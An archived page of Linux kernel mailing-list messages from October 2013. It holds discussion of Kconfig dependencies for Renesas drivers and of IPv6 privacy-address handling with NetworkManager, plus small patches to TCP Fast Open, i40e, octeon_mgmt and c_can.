* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Mark Brown @ 2013-10-29 17:58 UTC (permalink / raw)
To: Laurent Pinchart
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon Horman,
linux-arm
In-Reply-To: <1422562.0L87CDt5Gd@avalon>
[-- Attachment #1.1: Type: text/plain, Size: 1213 bytes --]
On Tue, Oct 29, 2013 at 06:29:59PM +0100, Laurent Pinchart wrote:
> On Tuesday 29 October 2013 10:23:31 Mark Brown wrote:
> > On Tue, Oct 29, 2013 at 06:05:53PM +0100, Laurent Pinchart wrote:
> > > The first one is that I can't compile-test all those drivers on all
> > > architectures. The spi-sh-msiof driver, for instance, uses
> > > io(read|write)(16|
> > Which architectures are these and is there not a symbol we can depend on
> > for them?
> arch/cris for instance. We can use readl/writel instead (maybe it would be
> time to rationalize and document the I/O accessors across all architectures,
> but that's another topic).
It'd certainly be sensible, or adding a config option to depend on if
you rely on these functions.
> My point is that there might be other issues that I won't be able to easily
> catch. This would break compilation for everybody for no reason, as the
> drivers are useless on non-SuperH, non-ARM platforms. That's why I believe
> COMPILE_TEST would be a better option as a first step.
Yes, it would - please do that. Note that it won't stop anyone running
into build issues on other architectures though, it's just about
stopping Kconfig noise.
[-- Attachment #1.2: Digital signature --]
[-- Type: application/pgp-signature, Size: 836 bytes --]
[-- Attachment #2: Type: text/plain, Size: 0 bytes --]
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Laurent Pinchart @ 2013-10-29 17:29 UTC (permalink / raw)
To: Mark Brown
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart,
ed.com-i9wRM+HIrmnmtl4Z8vJ8Kg761KYD1DLY, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon
In-Reply-To: <20131029172331.GA20251-GFdadSzt00ze9xe1eoZjHA@public.gmane.org>
[-- Attachment #1.1: Type: text/plain, Size: 1752 bytes --]
Hi Mark,
On Tuesday 29 October 2013 10:23:31 Mark Brown wrote:
> On Tue, Oct 29, 2013 at 06:05:53PM +0100, Laurent Pinchart wrote:
> > The first one is that I can't compile-test all those drivers on all
> > architectures. The spi-sh-msiof driver, for instance, uses
> > io(read|write)(16|
>
> Which architectures are these and is there not a symbol we can depend on
> for them?
arch/cris for instance. We can use readl/writel instead (maybe it would be
time to rationalize and document the I/O accessors across all architectures,
but that's another topic).
My point is that there might be other issues that I won't be able to easily
catch. This would break compilation for everybody for no reason, as the
drivers are useless on non-SuperH, non-ARM platforms. That's why I believe
COMPILE_TEST would be a better option as a first step.
> > 32) which are not available on all architectures. There might be other
> > similar problems that I can't catch, and I don't want to introduce build
> > breakages in the kernel.
>
> This is easy enough to handle if we do run into issues, it seems better to
> get things available than try to step through architecture by architecture.
>
> > The second reason is that, as the IP cores have never been used on
> > anything but SuperH and ARM, I don't like the idea of clobbering the
> > config process with drivers that are useless on the target architecture.
> > Now that we have a COMPILE_TEST Kconfig option, my preference would thus
> > go to SUPERH || ARM || COMPILE_TEST over no dependency at all.
>
> That's not what you did, though - you're not adding COMPILE_TEST.
No, but I can add it :-) If this gets agreed upon, I'll respin the series with
|| COMPILE_TEST.
--
Regards,
Laurent Pinchart
[-- Attachment #1.2: This is a digitally signed message part. --]
[-- Type: application/pgp-signature, Size: 490 bytes --]
[-- Attachment #2: Type: text/plain, Size: 0 bytes --]
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Mark Brown @ 2013-10-29 17:23 UTC (permalink / raw)
To: Laurent Pinchart
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon Horman,
linux-arm
In-Reply-To: <1577821.Q7gttkPE2J@avalon>
[-- Attachment #1.1: Type: text/plain, Size: 1082 bytes --]
On Tue, Oct 29, 2013 at 06:05:53PM +0100, Laurent Pinchart wrote:
> The first one is that I can't compile-test all those drivers on all
> architectures. The spi-sh-msiof driver, for instance, uses io(read|write)(16|
Which architectures are these and is there not a symbol we can depend on
for them?
> 32) which are not available on all architectures. There might be other similar
> problems that I can't catch, and I don't want to introduce build breakages in
> the kernel.
This is easy enough to handle if we do run into issues, it seems better
to get things available than try to step through architecture by
architecture.
> The second reason is that, as the IP cores have never been used on anything
> but SuperH and ARM, I don't like the idea of clobbering the config process
> with drivers that are useless on the target architecture. Now that we have a
> COMPILE_TEST Kconfig option, my preference would thus go to SUPERH || ARM ||
> COMPILE_TEST over no dependency at all.
That's not what you did, though - you're not adding COMPILE_TEST.
[-- Attachment #1.2: Digital signature --]
[-- Type: application/pgp-signature, Size: 836 bytes --]
[-- Attachment #2: Type: text/plain, Size: 0 bytes --]
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Dan Williams @ 2013-10-29 17:21 UTC (permalink / raw)
To: Hannes Frederic Sowa
Cc: David Miller, jiri, vyasevich, netdev, kuznet, jmorris, yoshfuji,
kaber, thaller, stephen
In-Reply-To: <20131029143847.GB16253@order.stressinduktion.org>
On Tue, 2013-10-29 at 15:38 +0100, Hannes Frederic Sowa wrote:
> Hi!
>
> On Tue, Oct 29, 2013 at 09:31:18AM -0500, Dan Williams wrote:
> > On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
> > > On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
> > > > On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
> > > > > From: Hannes Frederic Sowa <hannes@stressinduktion.org>
> > > > > Date: Sun, 27 Oct 2013 17:48:35 +0100
> > > > >
> > > > > > A temporary address is also bound to a non-privacy public address so
> > > > > > it's lifetime is determined by its lifetime (e.g. if you switch the
> > > > > > network and don't receive on-link information for that prefix any
> > > > > > more). NetworkManager would have to take care about that, too. It is
> > > > > > just a question of what NetworkManager wants to handle itself or lets
> > > > > > the kernel handle for it.
> > > > >
> > > > > How much really needs to be in userspace to implement RFC4941?
> > > > >
> > > > > I don't like the idea that even for a fully up and properly
> > > > > functioning link, if NetworkManager wedges then critical things like
> > > > > temporary address (re-)generation, will cease.
> > > >
> > > > Honestly, I'd be completely happy to leave temporary address handling up
> > > > to the kernel and *not* do it in userspace; the kernel already has all
> > > > the code. There are two problems with that though, (a) it's tied to
> > > > in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
> > > > these are solvable.
> > >
> > > Ah, (a) does complicate things, I agree. But the tieing is essential
> > > currently. So it seems a netlink interface would be needed to tie a new
> > > address to an already installed one, if the kernel should still deal
> > > with the regeneration?
> >
> > I think it's simpler than that. New flag set when adding the
> > non-private address that says "create and manage privacy addresses for
> > this non-private address". The kernel then adds the privacy addresses
> > generated off the non-private address/prefixlen, and ties their lifetime
> > to the non-private address. If the non-private address is removed, the
> > privacy addresses could get removed too.
> >
> > I don't think we need API to tie addresses to already installed ones,
> > because the kernel already has the privacy address generation code, so
> > why should userspace generate the privacy address at all? Just leave
> > that to the kernel.
>
> Ok.
>
> > > > First off, what's the reasoning behind having IPv6 privacy as a config
> > > > option? It's off-by-default and must be explicitly turned on, so is
> > > > there any harm in removing the config? Or is it just for
> > > > smallest-kernel-ever folks?
> > >
> > > I don't know about the policy. Does it really matter as distributions
> > > normally switch it on? But I would not like to see the option removed
> > > entirly, maybe the default could be changed.
> > >
> > > > Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
> > > > that for some new static address, that the kernel should create and
> > > > manage the temporary privacy addresses associated with its prefix?
> > >
> > > But this would only be needed if they were managed in user-space, no?
> >
> > "if they" == what? privacy address or static address? What
>
> With "they" I meant privacy addresses.
>
> > NetworkManager is trying to do is handle RAs in userspace with libndp
> > for various flexibility and behavioral reasons, but we'd really like to
> > leave all the temporary address stuff up to the kernel.
>
> Can you provide me with details why the Kernel RA implementation is not good
> enough? I tried to find some bugs, I found some but they were missing details
> or were not even correct or outdated.
First, RA handling is too tightly tied to interface flags. This is a
problem because interfaces are required to be IFF_UP for various
operations like carrier detection, wireless scanning, reading certain
interface properties, link statistics, etc. We can play games with
flipping accept_ra, but changing accept_ra doesn't trigger an RS. At
the moment, only interface flag changes trigger an RS, and that also can
reset a lot of L2 state.
Second, Router Solicitations are required at various times other than
NETDEV_CHANGE/NETDEV_UP. The router is not guaranteed to send (nor are
we guaranteed to receive) an RA when the RDNSS/DNSSL approach their
lifetimes, so to ensure those values are still still valid, we need to
send out an RS, especially on lossy networks where the RA might get
dropped.
Third, we need more flexibility in reading ND user options like DNSSL
and RDNSS and newer stuff. Every new option that userspace might want
to process requires some kernel code (ndisc_is_useropt()) to push it out
to userspace, and that means these options are not available on older
kernels.
Fourth, there's no opportunity to override any of the RA-derived
settings with user preferences before the kernel commits them. Perhaps
the user wishes to ignore a specific prefix (but accept other prefixes
or other RAs), or to ignore the automatically provided routes, or
whatever.
> > So NM would handle RA/RS and when it gets a prefix, it would create the
> > IPv6 non-private address and add it to the interface. When adding, it
> > would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> > would then handle all the privacy address generation, lifetimes, and
> > timers. Basically, break some of the privacy code away from the
> > in-kernel RA handling so that privacy addresses could be triggered from
> > userland too.
> >
> > Would that be workable?
>
> That sounds like a solid plan for me. I would actually liked to see that NM
> would use the kernel implementation but I guess there is no way back any more.
> :(
Some of the issues mentioned above might be inappropriate to solve
entirely in the kernel. I have no problem with in-kernel IPv6 for
simple use-cases and it works great for these. But if we think about
more complex functionality, especially where userland might want an
opportunity to override some of the behavior, and backwards
compatibility with kernels that don't implement these changes, we'd like
to handle some addrconf in userspace.
Dan
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Dan Williams @ 2013-10-29 17:15 UTC (permalink / raw)
To: Vlad Yasevich
Cc: Hannes Frederic Sowa, David Miller, jiri, netdev, kuznet, jmorris,
yoshfuji, kaber, thaller, stephen
In-Reply-To: <526FE93E.3040300@gmail.com>
On Tue, 2013-10-29 at 12:58 -0400, Vlad Yasevich wrote:
> On 10/29/2013 10:31 AM, Dan Williams wrote:
> > On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
> >> On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
> >>> On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
> >>>> From: Hannes Frederic Sowa <hannes@stressinduktion.org>
> >>>> Date: Sun, 27 Oct 2013 17:48:35 +0100
> >>>>
> >>>>> A temporary address is also bound to a non-privacy public address so
> >>>>> it's lifetime is determined by its lifetime (e.g. if you switch the
> >>>>> network and don't receive on-link information for that prefix any
> >>>>> more). NetworkManager would have to take care about that, too. It is
> >>>>> just a question of what NetworkManager wants to handle itself or lets
> >>>>> the kernel handle for it.
> >>>>
> >>>> How much really needs to be in userspace to implement RFC4941?
> >>>>
> >>>> I don't like the idea that even for a fully up and properly
> >>>> functioning link, if NetworkManager wedges then critical things like
> >>>> temporary address (re-)generation, will cease.
> >>>
> >>> Honestly, I'd be completely happy to leave temporary address handling up
> >>> to the kernel and *not* do it in userspace; the kernel already has all
> >>> the code. There are two problems with that though, (a) it's tied to
> >>> in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
> >>> these are solvable.
> >>
> >> Ah, (a) does complicate things, I agree. But the tieing is essential
> >> currently. So it seems a netlink interface would be needed to tie a new
> >> address to an already installed one, if the kernel should still deal
> >> with the regeneration?
> >
> > I think it's simpler than that. New flag set when adding the
> > non-private address that says "create and manage privacy addresses for
> > this non-private address". The kernel then adds the privacy addresses
> > generated off the non-private address/prefixlen, and ties their lifetime
> > to the non-private address. If the non-private address is removed, the
> > privacy addresses could get removed too.
> >
> > I don't think we need API to tie addresses to already installed ones,
> > because the kernel already has the privacy address generation code, so
> > why should userspace generate the privacy address at all? Just leave
> > that to the kernel.
> >
> >>> First off, what's the reasoning behind having IPv6 privacy as a config
> >>> option? It's off-by-default and must be explicitly turned on, so is
> >>> there any harm in removing the config? Or is it just for
> >>> smallest-kernel-ever folks?
> >>
> >> I don't know about the policy. Does it really matter as distributions
> >> normally switch it on? But I would not like to see the option removed
> >> entirly, maybe the default could be changed.
> >>
> >>> Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
> >>> that for some new static address, that the kernel should create and
> >>> manage the temporary privacy addresses associated with its prefix?
> >>
> >> But this would only be needed if they were managed in user-space, no?
> >
> > "if they" == what? privacy address or static address? What
> > NetworkManager is trying to do is handle RAs in userspace with libndp
> > for various flexibility and behavioral reasons, but we'd really like to
> > leave all the temporary address stuff up to the kernel.
> >
> > So NM would handle RA/RS and when it gets a prefix, it would create the
> > IPv6 non-private address and add it to the interface. When adding, it
> > would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> > would then handle all the privacy address generation, lifetimes, and
> > timers. Basically, break some of the privacy code away from the
> > in-kernel RA handling so that privacy addresses could be triggered from
> > userland too.
> >
> > Would that be workable?
>
> You are still dependent on the NM/user app to do this and what happens
> if that apps wedges?
In my proposal, the kernel would still manage the lifetimes of all the
addresses, since user app would add the non-privacy address with the
correct lifetime, and the kernel would generate the privacy addresses
with a corresponding lifetime. If the app wedges for some reason, then
the kernel will deprecate and eventually remove the non-privacy *and*
privacy addresses since their lifetimes have expired.
What if your dhclient wedges? What if ovsd or teamd goes down? Or your
openvpn, vpnc, pptp, pppd, sshd, whatever wedges? There's a lot of
networking that's controlled by userland these days, and failure of
these things also potentailly wedges your network. We should be
striving to make the best userland we can instead of trying to stuff
everything into the kernel in the name of reliability.
> I think we should just do privacy addresses automatically, or based on
> some sysconfig setting per interface to give users ability to turn it
> off. But I agree with David, and I speak from experience.
> You don't whant address configuration to be done by userspace daemon.
> There are too many things that can go wrong.
Should IPv6 should be that different from IPv4? DHCP is done by a
userspace daemon in all cases (v6 and v4), and other v4 is always done
by userland (static files, avahi-autoipd, other daemons). You can never
get away from userland here, and we need more flexibility in userland
than the kernel currently provides with its addrconf implementation.
Dan
^ permalink raw reply
* [PATCH net-next] tcp: temporarily disable Fast Open on SYN timeout
From: Yuchung Cheng @ 2013-10-29 17:09 UTC (permalink / raw)
To: davem, ncardwell, edumazet; +Cc: netdev, Yuchung Cheng
Fast Open currently has a fall back feature to address SYN-data
being dropped by but it requires the middle-box to pass on regular
SYN retry after SYN-data. This is implemented in commit aab487435
("net-tcp: Fast Open client - detecting SYN-data drops")
However some NAT boxes will drop all subsequent packets after first
SYN-data and blackholes the entire connections. An example is incommit
356d7d8 "netfilter: nf_conntrack: fix tcp_in_window for Fast Open".
The sender should note such incidents and falls back to use regular
TCP handshake on subsequent attempt temporarily as well: after the
second SYN timeouts the original Fast Open SYN is most likely lost.
When such an event recurs Fast Open is disabled based on the number
of recurrences exponentially.
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
---
net/ipv4/tcp_metrics.c | 5 +++--
net/ipv4/tcp_timer.c | 6 +++++-
2 files changed, 8 insertions(+), 3 deletions(-)
diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
index 4a2a841..2ab09cb 100644
--- a/net/ipv4/tcp_metrics.c
+++ b/net/ipv4/tcp_metrics.c
@@ -671,8 +671,9 @@ void tcp_fastopen_cache_set(struct sock *sk, u16 mss,
struct tcp_fastopen_metrics *tfom = &tm->tcpm_fastopen;
write_seqlock_bh(&fastopen_seqlock);
- tfom->mss = mss;
- if (cookie->len > 0)
+ if (mss)
+ tfom->mss = mss;
+ if (cookie && cookie->len > 0)
tfom->cookie = *cookie;
if (syn_lost) {
++tfom->syn_loss;
diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
index af07b5b..64f0354 100644
--- a/net/ipv4/tcp_timer.c
+++ b/net/ipv4/tcp_timer.c
@@ -156,12 +156,16 @@ static bool retransmits_timed_out(struct sock *sk,
static int tcp_write_timeout(struct sock *sk)
{
struct inet_connection_sock *icsk = inet_csk(sk);
+ struct tcp_sock *tp = tcp_sk(sk);
int retry_until;
bool do_reset, syn_set = false;
if ((1 << sk->sk_state) & (TCPF_SYN_SENT | TCPF_SYN_RECV)) {
- if (icsk->icsk_retransmits)
+ if (icsk->icsk_retransmits) {
dst_negative_advice(sk);
+ if (tp->syn_fastopen || tp->syn_data)
+ tcp_fastopen_cache_set(sk, 0, NULL, true);
+ }
retry_until = icsk->icsk_syn_retries ? : sysctl_tcp_syn_retries;
syn_set = true;
} else {
--
1.8.4.1
^ permalink raw reply related
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Laurent Pinchart @ 2013-10-29 17:05 UTC (permalink / raw)
To: Mark Brown
Cc: linux-fbdev-u79uwXL29TY76Z2rM5mHXA, Wolfram Sang, Linus Walleij,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd-IAPFreCvJWM7uuMidbF8XUB+6BGkLq7r,
linux-i2c-u79uwXL29TY76Z2rM5mHXA, Laurent Pinchart,
ed.com-i9wRM+HIrmnmtl4Z8vJ8Kg761KYD1DLY, Vinod Koul,
linux-sh-u79uwXL29TY76Z2rM5mHXA, Magnus Damm, Eduardo Valentin,
Tomi Valkeinen, linux-serial-u79uwXL29TY76Z2rM5mHXA,
linux-input-u79uwXL29TY76Z2rM5mHXA, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard,
linux-media-u79uwXL29TY76Z2rM5mHXA,
linux-pwm-u79uwXL29TY76Z2rM5mHXA, Samuel Ortiz,
linux-pm-u79uwXL29TY76Z2rM5mHXA, Ian Molton, Simon
In-Reply-To: <20131029160449.GD16686-GFdadSzt00ze9xe1eoZjHA@public.gmane.org>
[-- Attachment #1.1: Type: text/plain, Size: 1030 bytes --]
Hi Mark,
On Tuesday 29 October 2013 09:04:49 Mark Brown wrote:
> On Tue, Oct 29, 2013 at 03:04:27PM +0900, Simon Horman wrote:
> > I think this is a step in a good direction.
> > However, I think it would be even better if the architecture dependency
> > was removed completely.
>
> Yes, please.
I've kept it for two reasons.
The first one is that I can't compile-test all those drivers on all
architectures. The spi-sh-msiof driver, for instance, uses io(read|write)(16|
32) which are not available on all architectures. There might be other similar
problems that I can't catch, and I don't want to introduce build breakages in
the kernel.
The second reason is that, as the IP cores have never been used on anything
but SuperH and ARM, I don't like the idea of clobbering the config process
with drivers that are useless on the target architecture. Now that we have a
COMPILE_TEST Kconfig option, my preference would thus go to SUPERH || ARM ||
COMPILE_TEST over no dependency at all.
--
Regards,
Laurent Pinchart
[-- Attachment #1.2: This is a digitally signed message part. --]
[-- Type: application/pgp-signature, Size: 490 bytes --]
[-- Attachment #2: Type: text/plain, Size: 0 bytes --]
^ permalink raw reply
* Re: [net-next 11/11] i40e: fix error return code in i40e_probe()
From: Joe Perches @ 2013-10-29 17:05 UTC (permalink / raw)
To: Jeff Kirsher; +Cc: davem, Wei Yongjun, netdev, gospo, sassmann
In-Reply-To: <1383048151-15002-12-git-send-email-jeffrey.t.kirsher@intel.com>
On Tue, 2013-10-29 at 05:02 -0700, Jeff Kirsher wrote:
> Fix to return -ENOMEM in the memory alloc error handling
> case instead of 0, as done elsewhere in this function.
trivial note:
> diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
[]
> @@ -7204,8 +7204,10 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
> */
> len = sizeof(struct i40e_vsi *) * pf->hw.func_caps.num_vsis;
> pf->vsi = kzalloc(len, GFP_KERNEL);
> - if (!pf->vsi)
> + if (!pf->vsi) {
> + err = -ENOMEM;
> goto err_switch_setup;
> + }
This might be better as:
pf->vsi = kcalloc(pf->hw.func_caps.num_vsis, struct i40e_vsi *),
GFP_KERNEL);
and removing the now unused u32 len; declaration.
^ permalink raw reply
* Re: [patch net-next] ipv6: allow userspace to create address with IFLA_F_TEMPORARY flag
From: Vlad Yasevich @ 2013-10-29 16:58 UTC (permalink / raw)
To: Dan Williams, Hannes Frederic Sowa
Cc: David Miller, jiri, netdev, kuznet, jmorris, yoshfuji, kaber,
thaller, stephen
In-Reply-To: <1383057078.2236.12.camel@dcbw.foobar.com>
On 10/29/2013 10:31 AM, Dan Williams wrote:
> On Tue, 2013-10-29 at 00:48 +0100, Hannes Frederic Sowa wrote:
>> On Mon, Oct 28, 2013 at 06:16:19PM -0500, Dan Williams wrote:
>>> On Mon, 2013-10-28 at 17:17 -0400, David Miller wrote:
>>>> From: Hannes Frederic Sowa <hannes@stressinduktion.org>
>>>> Date: Sun, 27 Oct 2013 17:48:35 +0100
>>>>
>>>>> A temporary address is also bound to a non-privacy public address so
>>>>> it's lifetime is determined by its lifetime (e.g. if you switch the
>>>>> network and don't receive on-link information for that prefix any
>>>>> more). NetworkManager would have to take care about that, too. It is
>>>>> just a question of what NetworkManager wants to handle itself or lets
>>>>> the kernel handle for it.
>>>>
>>>> How much really needs to be in userspace to implement RFC4941?
>>>>
>>>> I don't like the idea that even for a fully up and properly
>>>> functioning link, if NetworkManager wedges then critical things like
>>>> temporary address (re-)generation, will cease.
>>>
>>> Honestly, I'd be completely happy to leave temporary address handling up
>>> to the kernel and *not* do it in userspace; the kernel already has all
>>> the code. There are two problems with that though, (a) it's tied to
>>> in-kernel RA handling, and (b) it's controlled by a CONFIG option. Both
>>> these are solvable.
>>
>> Ah, (a) does complicate things, I agree. But the tieing is essential
>> currently. So it seems a netlink interface would be needed to tie a new
>> address to an already installed one, if the kernel should still deal
>> with the regeneration?
>
> I think it's simpler than that. New flag set when adding the
> non-private address that says "create and manage privacy addresses for
> this non-private address". The kernel then adds the privacy addresses
> generated off the non-private address/prefixlen, and ties their lifetime
> to the non-private address. If the non-private address is removed, the
> privacy addresses could get removed too.
>
> I don't think we need API to tie addresses to already installed ones,
> because the kernel already has the privacy address generation code, so
> why should userspace generate the privacy address at all? Just leave
> that to the kernel.
>
>>> First off, what's the reasoning behind having IPv6 privacy as a config
>>> option? It's off-by-default and must be explicitly turned on, so is
>>> there any harm in removing the config? Or is it just for
>>> smallest-kernel-ever folks?
>>
>> I don't know about the policy. Does it really matter as distributions
>> normally switch it on? But I would not like to see the option removed
>> entirly, maybe the default could be changed.
>>
>>> Would a new IFA_F_MANAGE_TEMP (or better name) work here, indicating
>>> that for some new static address, that the kernel should create and
>>> manage the temporary privacy addresses associated with its prefix?
>>
>> But this would only be needed if they were managed in user-space, no?
>
> "if they" == what? privacy address or static address? What
> NetworkManager is trying to do is handle RAs in userspace with libndp
> for various flexibility and behavioral reasons, but we'd really like to
> leave all the temporary address stuff up to the kernel.
>
> So NM would handle RA/RS and when it gets a prefix, it would create the
> IPv6 non-private address and add it to the interface. When adding, it
> would also set the "IFA_F_MANAGE_TEMP" flag (or whatever) and the kernel
> would then handle all the privacy address generation, lifetimes, and
> timers. Basically, break some of the privacy code away from the
> in-kernel RA handling so that privacy addresses could be triggered from
> userland too.
>
> Would that be workable?
You are still dependent on the NM/user app to do this and what happens
if that apps wedges?
I think we should just do privacy addresses automatically, or based on
some sysconfig setting per interface to give users ability to turn it
off. But I agree with David, and I speak from experience.
You don't whant address configuration to be done by userspace daemon.
There are too many things that can go wrong.
-vlad
>
> Dan
>
^ permalink raw reply
* Re: [PATCH] netdev: octeon_mgmt: drop redundant mac address check
From: David Daney @ 2013-10-29 16:33 UTC (permalink / raw)
To: Luka Perkov, David Miller; +Cc: netdev, david.daney
In-Reply-To: <1383010061-25461-1-git-send-email-luka@openwrt.org>
On 10/28/2013 06:27 PM, Luka Perkov wrote:
> Checking if MAC address is valid using is_valid_ether_addr() is already done in
> of_get_mac_address().
>
> Signed-off-by: Luka Perkov <luka@openwrt.org>
This looks sane, but I haven't tested it...
Acked-by: David Daney <david.daney@cavium.com>
> ---
> drivers/net/ethernet/octeon/octeon_mgmt.c | 2 +-
> 1 file changed, 1 insertion(+), 1 deletion(-)
>
> diff --git a/drivers/net/ethernet/octeon/octeon_mgmt.c b/drivers/net/ethernet/octeon/octeon_mgmt.c
> index 622aa75..1b326cbc 100644
> --- a/drivers/net/ethernet/octeon/octeon_mgmt.c
> +++ b/drivers/net/ethernet/octeon/octeon_mgmt.c
> @@ -1545,7 +1545,7 @@ static int octeon_mgmt_probe(struct platform_device *pdev)
>
> mac = of_get_mac_address(pdev->dev.of_node);
>
> - if (mac && is_valid_ether_addr(mac))
> + if (mac)
> memcpy(netdev->dev_addr, mac, ETH_ALEN);
> else
> eth_hw_addr_random(netdev);
>
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
From: Linus Walleij @ 2013-10-29 16:28 UTC (permalink / raw)
To: Laurent Pinchart
Cc: linux-fbdev@vger.kernel.org, linux-sh@vger.kernel.org,
Guennadi Liakhovetski, Thierry Reding,
linux-mtd@lists.infradead.org, linux-i2c@vger.kernel.org,
Vinod Koul, Joerg Roedel, Wolfram Sang, Magnus Damm,
Eduardo Valentin, Tomi Valkeinen, linux-serial@vger.kernel.org,
Linux Input, Zhang Rui, Chris Ball,
Jean-Christophe Plagniol-Villard, linux-media@vger.kernel.org,
"linux-pwm@vger.kernel.org" <linu
In-Reply-To: <1383004027-25036-1-git-send-email-laurent.pinchart+renesas@ideasonboard.com>
On Mon, Oct 28, 2013 at 4:46 PM, Laurent Pinchart
<laurent.pinchart+renesas@ideasonboard.com> wrote:
> If you believe the issue should be solved in a different way (for instance by
> removing the architecture dependency completely) please reply to the cover
> letter to let other maintainers chime in.
I have no real opinions on whether this is a good itermediate step towards
complete arch-independence or not, but I just noticed that you still
have the <mach/*> hierarchy in mach-shmobile/include/mach/*, and
grep:ing around this seems totally unnecessary, I think it would be
easy to produce a patch set eliminating <mach/*> from shmobile.
(Usually we will just move all the headers down into the
mach-shmobile folder.)
Yours,
Linus Walleij
______________________________________________________
Linux MTD discussion mailing list
http://lists.infradead.org/mailman/listinfo/linux-mtd/
^ permalink raw reply
* Re: [PATCH v2] can: c_can: Speed up rx_poll function
From: Joe Perches @ 2013-10-29 16:24 UTC (permalink / raw)
To: Markus Pargmann
Cc: Marc Kleine-Budde, Wolfgang Grandegger, linux-can, netdev,
linux-kernel, kernel
In-Reply-To: <20131029085853.GC20839@pengutronix.de>
On Tue, 2013-10-29 at 09:58 +0100, Markus Pargmann wrote:
> On Tue, Oct 29, 2013 at 01:34:48AM -0700, Joe Perches wrote:
> > On Tue, 2013-10-29 at 09:27 +0100, Markus Pargmann wrote:
> > > This patch speeds up the rx_poll function by reducing the number of
> > > register reads.
> > []
> > > 125kbit:
> > > Function Hit Time Avg s^2
> > > -------- --- ---- --- ---
> > > c_can_do_rx_poll 63960 10168178 us 158.977 us 1493056 us
> > > With patch:
> > > c_can_do_rx_poll 63939 4268457 us 66.758 us 818790.9 us
> > >
> > > 1Mbit:
> > > Function Hit Time Avg s^2
> > > -------- --- ---- --- ---
> > > c_can_do_rx_poll 69489 30049498 us 432.435 us 9271851 us
> > > With patch:
> > > c_can_do_rx_poll 103034 24220362 us 235.071 us 6016656 us
[]
> Yes I just measured the timings again:
[]
> ./perf_can_test.sh 125000 30
[]
> c_can_do_rx_poll 63941 3764057 us 58.867 us 776162.2 us
Good, it's slightly faster still.
> ./perf_can_test.sh 1000000 30
[]
> c_can_do_rx_poll 207109 24322185 us 117.436 us 171469047 us
[]
> It is interesting that the number of hits for c_can_do_rx_poll is twice as much
> as it was with find_next_bit.
How is this possible? Any idea?
^ permalink raw reply
* Re: [PATCH 00/19] Enable various Renesas drivers on all ARM platforms
